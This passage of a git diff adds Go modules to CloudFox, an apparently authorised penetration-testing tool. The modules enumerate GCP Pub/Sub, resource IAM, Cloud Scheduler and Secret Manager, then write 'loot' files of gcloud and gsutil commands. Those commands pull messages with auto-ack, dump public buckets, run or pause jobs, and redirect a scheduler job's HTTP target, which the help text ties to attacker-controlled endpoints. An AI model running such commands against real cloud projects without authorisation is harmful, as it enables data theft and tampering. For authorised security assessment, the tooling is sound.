--project=%s\n\n", + topic.Name, topic.ProjectID, + topic.Name, topic.ProjectID, + topic.Name, topic.ProjectID, + topic.Name, topic.ProjectID, + ) +} + +func (m *PubSubModule) addSubscriptionToLoot(sub PubSubService.SubscriptionInfo) { + m.LootMap["pubsub-commands"].Contents += fmt.Sprintf( + "## Subscription: %s (Project: %s)\n"+ + "# Topic: %s\n", + sub.Name, sub.ProjectID, + sub.Topic, + ) + + // Cross-project info + if sub.TopicProject != "" && sub.TopicProject != sub.ProjectID { + m.LootMap["pubsub-commands"].Contents += fmt.Sprintf("# Cross-Project: Yes (topic in %s)\n", sub.TopicProject) + } + + // Push endpoint info + if sub.PushEndpoint != "" { + m.LootMap["pubsub-commands"].Contents += fmt.Sprintf( + "# Push Endpoint: %s\n"+ + "# Push Service Account: %s\n", + sub.PushEndpoint, + sub.PushServiceAccount, + ) + } + + // Export destinations + if sub.BigQueryTable != "" { + m.LootMap["pubsub-commands"].Contents += fmt.Sprintf("# BigQuery Export: %s\n", sub.BigQueryTable) + } + if sub.CloudStorageBucket != "" { + m.LootMap["pubsub-commands"].Contents += fmt.Sprintf("# GCS Export: %s\n", sub.CloudStorageBucket) + } + + // Dead letter config + if sub.DeadLetterTopic != "" { + m.LootMap["pubsub-commands"].Contents += fmt.Sprintf( + "# Dead Letter Topic: %s (Max Attempts: %d)\n", + sub.DeadLetterTopic, + sub.MaxDeliveryAttempts, + ) + } + + // IAM bindings + if len(sub.IAMBindings) > 0 { + m.LootMap["pubsub-commands"].Contents += "# IAM Bindings:\n" + for _, binding := range sub.IAMBindings { + m.LootMap["pubsub-commands"].Contents += fmt.Sprintf("# %s -> %s\n", binding.Role, binding.Member) + } + } + + m.LootMap["pubsub-commands"].Contents += fmt.Sprintf( + "\n# Describe subscription:\n"+ + "gcloud pubsub subscriptions describe %s --project=%s\n\n"+ + "# Get IAM policy:\n"+ + "gcloud pubsub subscriptions get-iam-policy %s --project=%s\n\n"+ + "# Pull messages:\n"+ + "gcloud pubsub subscriptions pull %s --project=%s --limit=10 --auto-ack\n\n", + sub.Name, sub.ProjectID, + sub.Name, sub.ProjectID, + sub.Name, sub.ProjectID, + ) + + // BigQuery command + if sub.BigQueryTable != "" { + m.LootMap["pubsub-commands"].Contents += fmt.Sprintf("# Query BigQuery export:\nbq show %s\n\n", sub.BigQueryTable) + } + + // GCS command + if sub.CloudStorageBucket != "" { + m.LootMap["pubsub-commands"].Contents += fmt.Sprintf("# List GCS export:\ngsutil ls gs://%s/\n\n", sub.CloudStorageBucket) + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *PubSubModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Topics table - one row per IAM binding + topicsHeader := []string{ + "Project Name", + "Project ID", + "Topic Name", + "Subscriptions", + "KMS Key", + "Retention", + "IAM Role", + "IAM Member", + } + + var topicsBody [][]string + for _, topic := range m.Topics { + // Format KMS key + kmsKey := "-" + if topic.KmsKeyName != "" { + kmsKey = topic.KmsKeyName + } + + // Format retention + retention := "-" + if topic.MessageRetentionDuration != "" { + retention = topic.MessageRetentionDuration + } + + if len(topic.IAMBindings) > 0 { + // One row per IAM binding + for _, binding := range topic.IAMBindings { + topicsBody = append(topicsBody, []string{ + m.GetProjectName(topic.ProjectID), + topic.ProjectID, + topic.Name, + fmt.Sprintf("%d", topic.SubscriptionCount), + kmsKey, + retention, + binding.Role, + binding.Member, + }) + } + } else { + // No IAM bindings - single row with empty IAM columns + topicsBody = append(topicsBody, []string{ + m.GetProjectName(topic.ProjectID), + topic.ProjectID, + topic.Name, + fmt.Sprintf("%d", topic.SubscriptionCount), + kmsKey, + retention, + "-", + "-", + }) + } + } + + // Subscriptions table - one row per IAM binding + subsHeader := []string{ + "Project Name", + "Project ID", + "Subscription", + "Topic", + "Type", + "Push Endpoint / Export", + "Cross-Project", + "Dead Letter", + "IAM Role", + "IAM Member", + } + + var subsBody [][]string + for _, sub := range m.Subscriptions { + // Determine type + subType := "Pull" + destination := "-" + if sub.PushEndpoint != "" { + subType = "Push" + destination = sub.PushEndpoint + } else if sub.BigQueryTable != "" { + subType = "BigQuery" + destination = sub.BigQueryTable + } else if sub.CloudStorageBucket != "" { + subType = "GCS" + destination = sub.CloudStorageBucket + } + + // Format cross-project + crossProject := "-" + if sub.TopicProject != "" && sub.TopicProject != sub.ProjectID { + crossProject = sub.TopicProject + } + + // Format dead letter + deadLetter := "-" + if sub.DeadLetterTopic != "" { + deadLetter = sub.DeadLetterTopic + } + + if len(sub.IAMBindings) > 0 { + // One row per IAM binding + for _, binding := range sub.IAMBindings { + subsBody = append(subsBody, []string{ + m.GetProjectName(sub.ProjectID), + sub.ProjectID, + sub.Name, + sub.Topic, + subType, + destination, + crossProject, + deadLetter, + binding.Role, + binding.Member, + }) + } + } else { + // No IAM bindings - single row with empty IAM columns + subsBody = append(subsBody, []string{ + m.GetProjectName(sub.ProjectID), + sub.ProjectID, + sub.Name, + sub.Topic, + subType, + destination, + crossProject, + deadLetter, + "-", + "-", + }) + } + } + + // Collect loot files - only include if they have content beyond the header + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build table files + tableFiles := []internal.TableFile{} + + if len(topicsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_PUBSUB_MODULE_NAME + "-topics", + Header: topicsHeader, + Body: topicsBody, + }) + } + + if len(subsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_PUBSUB_MODULE_NAME + "-subscriptions", + Header: subsHeader, + Body: subsBody, + }) + } + + output := PubSubOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_PUBSUB_MODULE_NAME) + m.CommandCounter.Error++ + } +} + + diff --git a/gcp/commands/resourceiam.go b/gcp/commands/resourceiam.go new file mode 100644 index 00000000..ff659376 --- /dev/null +++ b/gcp/commands/resourceiam.go @@ -0,0 +1,343 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + resourceiamservice "github.com/BishopFox/cloudfox/gcp/services/resourceIAMService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPResourceIAMCommand = &cobra.Command{ + Use: globals.GCP_RESOURCEIAM_MODULE_NAME, + Aliases: []string{"resiam", "resource-policies"}, + Short: "Enumerate IAM policies on GCP resources (buckets, datasets, secrets, etc.)", + Long: `Enumerate IAM policies attached directly to GCP resources. + +This module discovers WHO has access to WHAT resources by enumerating +resource-level IAM policies (not just project-level policies). + +Supported Resource Types: +- Cloud Storage buckets +- BigQuery datasets +- Pub/Sub topics and subscriptions +- Secret Manager secrets +- Cloud KMS keys +- Cloud Functions +- Cloud Run services + +Key Findings: +- Public access (allUsers/allAuthenticatedUsers) +- Cross-project access patterns +- Overly permissive roles on sensitive resources +- Federated identity access to resources`, + Run: runGCPResourceIAMCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type ResourceIAMModule struct { + gcpinternal.BaseGCPModule + + Bindings []resourceiamservice.ResourceIAMBinding + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type ResourceIAMOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o ResourceIAMOutput) TableFiles() []internal.TableFile { return o.Table } +func (o ResourceIAMOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPResourceIAMCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_RESOURCEIAM_MODULE_NAME) + if err != nil { + return + } + + module := &ResourceIAMModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Bindings: []resourceiamservice.ResourceIAMBinding{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *ResourceIAMModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Enumerating resource-level IAM policies...", globals.GCP_RESOURCEIAM_MODULE_NAME) + + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_RESOURCEIAM_MODULE_NAME, m.processProject) + + if len(m.Bindings) == 0 { + logger.InfoM("No resource IAM bindings found", globals.GCP_RESOURCEIAM_MODULE_NAME) + return + } + + // Count statistics + publicCount := 0 + resourceTypes := make(map[string]int) + for _, b := range m.Bindings { + resourceTypes[b.ResourceType]++ + if b.IsPublic { + publicCount++ + } + } + + // Build summary + var typeSummary []string + for rt, count := range resourceTypes { + typeSummary = append(typeSummary, fmt.Sprintf("%d %s(s)", count, rt)) + } + + logger.SuccessM(fmt.Sprintf("Found %d resource IAM binding(s): %s", + len(m.Bindings), strings.Join(typeSummary, ", ")), globals.GCP_RESOURCEIAM_MODULE_NAME) + + if publicCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d PUBLIC resource binding(s)!", publicCount), globals.GCP_RESOURCEIAM_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *ResourceIAMModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating resource IAM in project: %s", projectID), globals.GCP_RESOURCEIAM_MODULE_NAME) + } + + svc := resourceiamservice.New() + bindings, err := svc.GetAllResourceIAM(ctx, projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_RESOURCEIAM_MODULE_NAME, + fmt.Sprintf("Could not enumerate resource IAM in project %s", projectID)) + return + } + + m.mu.Lock() + m.Bindings = append(m.Bindings, bindings...) + + // Generate loot for public resources + for _, b := range bindings { + if b.IsPublic { + m.addPublicResourceToLoot(b) + } + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d resource IAM binding(s) in project %s", len(bindings), projectID), globals.GCP_RESOURCEIAM_MODULE_NAME) + } +} + +// ------------------------------ +// Loot Management +// ------------------------------ +func (m *ResourceIAMModule) initializeLootFiles() { + m.LootMap["resource-iam-commands"] = &internal.LootFile{ + Name: "resource-iam-commands", + Contents: "# Resource IAM Commands\n# Generated by CloudFox\n\n", + } + m.LootMap["public-resources"] = &internal.LootFile{ + Name: "public-resources", + Contents: "# Public Resources\n# Generated by CloudFox\n# These resources have allUsers or allAuthenticatedUsers access!\n\n", + } +} + +func (m *ResourceIAMModule) addPublicResourceToLoot(b resourceiamservice.ResourceIAMBinding) { + m.LootMap["public-resources"].Contents += fmt.Sprintf( + "# %s: %s\n# Member: %s, Role: %s\n", + b.ResourceType, b.ResourceName, b.Member, b.Role, + ) + + // Add exploitation commands based on resource type + switch b.ResourceType { + case "bucket": + m.LootMap["public-resources"].Contents += fmt.Sprintf( + "gsutil ls %s\ngsutil cat %s/*\n\n", + b.ResourceName, b.ResourceName, + ) + case "function": + m.LootMap["public-resources"].Contents += fmt.Sprintf( + "# Function may be publicly invokable\ngcloud functions describe %s --project=%s\n\n", + b.ResourceID, b.ProjectID, + ) + case "cloudrun": + m.LootMap["public-resources"].Contents += fmt.Sprintf( + "# Cloud Run service may be publicly accessible\ngcloud run services describe %s --project=%s\n\n", + b.ResourceID, b.ProjectID, + ) + } +} + +// resourceKey creates a unique key for a resource to group bindings +func resourceKey(b resourceiamservice.ResourceIAMBinding) string { + return fmt.Sprintf("%s|%s|%s", b.ProjectID, b.ResourceType, b.ResourceName) +} + +// shortenRole extracts a readable role name from the full role path +func shortenRole(role string) string { + // roles/storage.objectViewer -> objectViewer + // projects/xxx/roles/customRole -> customRole + if idx := strings.LastIndex(role, "/"); idx != -1 { + return role[idx+1:] + } + return role +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *ResourceIAMModule) writeOutput(ctx context.Context, logger internal.Logger) { + header := []string{ + "Project ID", + "Resource Type", + "Resource ID", + "Resource Name", + "Public", + "Access (memberType:member [role])", + "Condition", + } + + // Group bindings by resource + resourceBindings := make(map[string][]resourceiamservice.ResourceIAMBinding) + resourceOrder := []string{} // Maintain order + for _, b := range m.Bindings { + key := resourceKey(b) + if _, exists := resourceBindings[key]; !exists { + resourceOrder = append(resourceOrder, key) + } + resourceBindings[key] = append(resourceBindings[key], b) + } + + var body [][]string + for _, key := range resourceOrder { + bindings := resourceBindings[key] + if len(bindings) == 0 { + continue + } + + // Use first binding for resource info + first := bindings[0] + + // Check if any binding is public + isPublic := "No" + for _, b := range bindings { + if b.IsPublic { + isPublic = "Yes" + break + } + } + + // Build access list: one line per entity "memberType:member [role]" + var accessList []string + var conditionList []string + for _, b := range bindings { + // Format: memberType:member [shortRole] + member := b.MemberEmail + if member == "" { + member = b.Member + } + memberType := strings.ToLower(b.MemberType) + role := shortenRole(b.Role) + + entry := fmt.Sprintf("%s:%s [%s]", memberType, member, role) + accessList = append(accessList, entry) + + // Collect condition expressions + if b.HasCondition && b.ConditionExpression != "" { + condEntry := b.ConditionExpression + if b.ConditionTitle != "" { + condEntry = fmt.Sprintf("%s: %s", b.ConditionTitle, b.ConditionExpression) + } + // Avoid duplicates + found := false + for _, existing := range conditionList { + if existing == condEntry { + found = true + break + } + } + if !found { + conditionList = append(conditionList, condEntry) + } + } + } + + condition := "-" + if len(conditionList) > 0 { + condition = strings.Join(conditionList, "\n") + } + + body = append(body, []string{ + first.ProjectID, + first.ResourceType, + first.ResourceID, + first.ResourceName, + isPublic, + strings.Join(accessList, "\n"), + condition, + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") && + !strings.HasSuffix(loot.Contents, "# These resources have allUsers or allAuthenticatedUsers access!\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + tables := []internal.TableFile{ + { + Name: "resource-iam", + Header: header, + Body: body, + }, + } + + output := ResourceIAMOutput{ + Table: tables, + Loot: lootFiles, + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + []string{}, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_RESOURCEIAM_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/scheduler.go b/gcp/commands/scheduler.go new file mode 100644 index 00000000..19bc1619 --- /dev/null +++ b/gcp/commands/scheduler.go @@ -0,0 +1,325 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + SchedulerService "github.com/BishopFox/cloudfox/gcp/services/schedulerService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPSchedulerCommand = &cobra.Command{ + Use: globals.GCP_SCHEDULER_MODULE_NAME, + Aliases: []string{"cron", "jobs"}, + Short: "Enumerate Cloud Scheduler jobs with security analysis", + Long: `Enumerate Cloud Scheduler jobs across projects with security-relevant details. + +Features: +- Lists all Cloud Scheduler jobs +- Shows target configuration (HTTP, Pub/Sub, App Engine) +- Identifies service accounts used for authentication +- Shows schedule (cron) expressions +- Displays job state and last execution status +- Generates gcloud commands for job manipulation + +Security Columns: +- Target: HTTP endpoint, Pub/Sub topic, or App Engine service +- ServiceAccount: Identity used when invoking targets +- Schedule: When the job runs (cron expression) +- State: ENABLED, PAUSED, or DISABLED + +Attack Surface: +- HTTP targets may call internal or external endpoints +- Service accounts may have excessive permissions +- Jobs can be modified to call attacker-controlled endpoints +- Paused jobs may indicate suspended malicious activity`, + Run: runGCPSchedulerCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type SchedulerModule struct { + gcpinternal.BaseGCPModule + + Jobs []SchedulerService.JobInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type SchedulerOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o SchedulerOutput) TableFiles() []internal.TableFile { return o.Table } +func (o SchedulerOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPSchedulerCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_SCHEDULER_MODULE_NAME) + if err != nil { + return + } + + module := &SchedulerModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Jobs: []SchedulerService.JobInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *SchedulerModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_SCHEDULER_MODULE_NAME, m.processProject) + + if len(m.Jobs) == 0 { + logger.InfoM("No Cloud Scheduler jobs found", globals.GCP_SCHEDULER_MODULE_NAME) + return + } + + // Count job states + enabledCount := 0 + httpCount := 0 + for _, job := range m.Jobs { + if job.State == "ENABLED" { + enabledCount++ + } + if job.TargetType == "http" { + httpCount++ + } + } + + msg := fmt.Sprintf("Found %d job(s)", len(m.Jobs)) + if enabledCount > 0 { + msg += fmt.Sprintf(" [%d enabled]", enabledCount) + } + if httpCount > 0 { + msg += fmt.Sprintf(" [%d HTTP targets]", httpCount) + } + logger.SuccessM(msg, globals.GCP_SCHEDULER_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *SchedulerModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Scheduler jobs in project: %s", projectID), globals.GCP_SCHEDULER_MODULE_NAME) + } + + ss := SchedulerService.New() + + jobs, err := ss.Jobs(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_SCHEDULER_MODULE_NAME, + fmt.Sprintf("Could not enumerate Scheduler jobs in project %s", projectID)) + return + } + + m.mu.Lock() + m.Jobs = append(m.Jobs, jobs...) + for _, job := range jobs { + m.addJobToLoot(job) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d job(s) in project %s", len(jobs), projectID), globals.GCP_SCHEDULER_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *SchedulerModule) initializeLootFiles() { + m.LootMap["scheduler-commands"] = &internal.LootFile{ + Name: "scheduler-commands", + Contents: "# Scheduler Commands\n" + + "# Generated by CloudFox\n" + + "# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *SchedulerModule) addJobToLoot(job SchedulerService.JobInfo) { + target := formatTargetFull(job) + + m.LootMap["scheduler-commands"].Contents += fmt.Sprintf( + "## Job: %s (Project: %s, Location: %s)\n"+ + "# State: %s\n"+ + "# Schedule: %s (%s)\n"+ + "# Target: %s -> %s\n", + job.Name, job.ProjectID, job.Location, + job.State, + job.Schedule, job.TimeZone, + job.TargetType, target, + ) + + if job.ServiceAccount != "" { + m.LootMap["scheduler-commands"].Contents += fmt.Sprintf( + "# Service Account: %s\n", + job.ServiceAccount, + ) + } + + m.LootMap["scheduler-commands"].Contents += fmt.Sprintf( + "\n# Describe job:\n"+ + "gcloud scheduler jobs describe %s --location=%s --project=%s\n\n"+ + "# Run job immediately:\n"+ + "gcloud scheduler jobs run %s --location=%s --project=%s\n\n"+ + "# Pause job:\n"+ + "gcloud scheduler jobs pause %s --location=%s --project=%s\n\n", + job.Name, job.Location, job.ProjectID, + job.Name, job.Location, job.ProjectID, + job.Name, job.Location, job.ProjectID, + ) + + if job.TargetType == "http" { + m.LootMap["scheduler-commands"].Contents += fmt.Sprintf( + "# Update HTTP target (requires cloudscheduler.jobs.update):\n"+ + "gcloud scheduler jobs update http %s --location=%s --project=%s --uri=\"NEW_URL\"\n\n", + job.Name, job.Location, job.ProjectID, + ) + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *SchedulerModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Jobs table + header := []string{ + "Project Name", + "Project ID", + "Job Name", + "Location", + "State", + "Schedule", + "Target Type", + "Target", + "Service Account", + "Last Run", + } + + var body [][]string + for _, job := range m.Jobs { + // Format target - full, no truncation + target := formatTargetFull(job) + + // Format service account - full, no truncation + sa := "-" + if job.ServiceAccount != "" { + sa = job.ServiceAccount + } + + // Format last run + lastRun := "-" + if job.LastAttemptTime != "" { + lastRun = job.LastAttemptTime + if job.Status != "" && job.Status != "OK" { + lastRun += " (FAILED)" + } + } + + body = append(body, []string{ + m.GetProjectName(job.ProjectID), + job.ProjectID, + job.Name, + job.Location, + job.State, + job.Schedule, + job.TargetType, + target, + sa, + lastRun, + }) + } + + // Collect loot files - only include if they have content beyond the header + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build table files + tableFiles := []internal.TableFile{ + { + Name: globals.GCP_SCHEDULER_MODULE_NAME, + Header: header, + Body: body, + }, + } + + output := SchedulerOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_SCHEDULER_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// Helper functions + +// formatTargetFull formats the job target for display without truncation +func formatTargetFull(job SchedulerService.JobInfo) string { + switch job.TargetType { + case "http": + return job.TargetURI + case "pubsub": + return job.TargetTopic + case "appengine": + target := job.TargetService + if job.TargetVersion != "" { + target += "/" + job.TargetVersion + } + if job.TargetURI != "" { + target += job.TargetURI + } + if target == "" { + return "-" + } + return target + default: + return "-" + } +} diff --git a/gcp/commands/secrets.go b/gcp/commands/secrets.go index f5c691c2..5fe5c4e5 100644 --- a/gcp/commands/secrets.go +++ b/gcp/commands/secrets.go @@ -1,120 +1,421 @@ package commands import ( + "context" "fmt" + "strings" + "sync" secretmanager "cloud.google.com/go/secretmanager/apiv1" SecretsService "github.com/BishopFox/cloudfox/gcp/services/secretsService" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/BishopFox/cloudfox/globals" - "github.com/BishopFox/cloudfox/internal" "github.com/spf13/cobra" ) var GCPSecretsCommand = &cobra.Command{ Use: globals.GCP_SECRETS_MODULE_NAME, - Aliases: []string{}, - Short: "Display GCP secrets information", - Args: cobra.MinimumNArgs(0), - Long: ` -Display available secrets information: -cloudfox gcp secrets`, + Aliases: []string{"secretmanager", "sm"}, + Short: "Enumerate GCP Secret Manager secrets with security configuration", + Long: `Enumerate GCP Secret Manager secrets across projects with security-relevant details. + +Features: +- Lists all secrets with metadata and security configuration +- Shows encryption type (Google-managed vs CMEK) +- Shows replication configuration (automatic vs user-managed) +- Shows expiration and rotation settings +- Enumerates IAM policies per secret +- Generates gcloud commands for secret access +- Generates exploitation commands for secret extraction + +Security Columns: +- Encryption: "Google-managed" or "CMEK" (customer-managed keys) +- Replication: "automatic" or "user-managed" with locations +- Rotation: Whether automatic rotation is enabled +- Expiration: Whether the secret has an expiration time/TTL +- VersionDestroyTTL: Delayed destruction period for old versions`, Run: runGCPSecretsCommand, } -// GCPSecretsResults struct that implements the internal.OutputInterface -type GCPSecretsResults struct { - Data []SecretsService.SecretInfo +// ------------------------------ +// Module Struct with embedded BaseGCPModule +// ------------------------------ +type SecretsModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields + Secrets []SecretsService.SecretInfo + LootMap map[string]*internal.LootFile + client *secretmanager.Client + mu sync.Mutex +} + +// ------------------------------ +// Output Struct implementing CloudfoxOutput interface +// ------------------------------ +type SecretsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile } -func (g GCPSecretsResults) TableFiles() []internal.TableFile { - var tableFiles []internal.TableFile +func (o SecretsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o SecretsOutput) LootFiles() []internal.LootFile { return o.Loot } - header := []string{ - "Name", - "CreationTime", - "Labels", - "Rotation", - "ProjectID", - // Add more fields as necessary +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPSecretsCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_SECRETS_MODULE_NAME) + if err != nil { + return // Error already logged } - var body [][]string - for _, value := range g.Data { - body = append(body, []string{ - value.Name, - value.CreationTime, - fmt.Sprintf("%v", value.Labels), - value.Rotation, - value.ProjectID, - }) + // Create Secret Manager client + client, err := secretmanager.NewClient(cmdCtx.Ctx) + if err != nil { + cmdCtx.Logger.ErrorM(fmt.Sprintf("Failed to create Secret Manager client: %v", err), globals.GCP_SECRETS_MODULE_NAME) + return } + defer client.Close() - tableFile := internal.TableFile{ - Header: header, - Body: body, - Name: globals.GCP_SECRETS_MODULE_NAME, + // Create module instance + module := &SecretsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Secrets: []SecretsService.SecretInfo{}, + LootMap: make(map[string]*internal.LootFile), + client: client, } - tableFiles = append(tableFiles, tableFile) - return tableFiles -} + // Initialize loot files + module.initializeLootFiles() -func (g GCPSecretsResults) LootFiles() []internal.LootFile { - // Define any specific data considered as loot - return []internal.LootFile{} + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } -func runGCPSecretsCommand(cmd *cobra.Command, args []string) { - var projectIDs []string - var account string - parentCmd := cmd.Parent() - ctx := cmd.Context() - logger := internal.NewLogger() - if value, ok := ctx.Value("projectIDs").([]string); ok && len(value) > 0 { - projectIDs = value - } else { - logger.ErrorM("Could not retrieve projectIDs from flag value or value is empty", globals.GCP_SECRETS_MODULE_NAME) +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *SecretsModule) Execute(ctx context.Context, logger internal.Logger) { + // Run enumeration with concurrency + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_SECRETS_MODULE_NAME, m.processProject) + + // Check results + if len(m.Secrets) == 0 { + logger.InfoM("No secrets found", globals.GCP_SECRETS_MODULE_NAME) return } - if value, ok := ctx.Value("account").(string); ok { - account = value - } else { - logger.ErrorM("Could not retrieve account email from command", globals.GCP_IAM_MODULE_NAME) + logger.SuccessM(fmt.Sprintf("Found %d secret(s)", len(m.Secrets)), globals.GCP_SECRETS_MODULE_NAME) + + // Write output + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor (called concurrently for each project) +// ------------------------------ +func (m *SecretsModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating secrets in project: %s", projectID), globals.GCP_SECRETS_MODULE_NAME) } - client, err := secretmanager.NewClient(ctx) + // Create service and fetch secrets + ss := SecretsService.New(m.client) + secrets, err := ss.Secrets(projectID) if err != nil { - logger.ErrorM(fmt.Sprintf("failed to create secret manager client: %v", err), globals.GCP_SECRETS_MODULE_NAME) + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_SECRETS_MODULE_NAME, + fmt.Sprintf("Could not enumerate secrets in project %s", projectID)) return } - defer client.Close() - ss := SecretsService.New(client) - var results []SecretsService.SecretInfo - - // Set output params from parentCmd - verbosity, _ := parentCmd.PersistentFlags().GetInt("verbosity") - wrap, _ := parentCmd.PersistentFlags().GetBool("wrap") - outputDirectory, _ := parentCmd.PersistentFlags().GetString("outdir") - format, _ := parentCmd.PersistentFlags().GetString("output") - - for _, projectID := range projectIDs { - logger.InfoM(fmt.Sprintf("Retrieving all secrets from project: %s", projectID), globals.GCP_SECRETS_MODULE_NAME) - result, err := ss.Secrets(projectID) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_SECRETS_MODULE_NAME) - return + // Thread-safe append + m.mu.Lock() + m.Secrets = append(m.Secrets, secrets...) + + // Generate loot for each secret + for _, secret := range secrets { + m.addSecretToLoot(secret) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d secret(s) in project %s", len(secrets), projectID), globals.GCP_SECRETS_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *SecretsModule) initializeLootFiles() { + 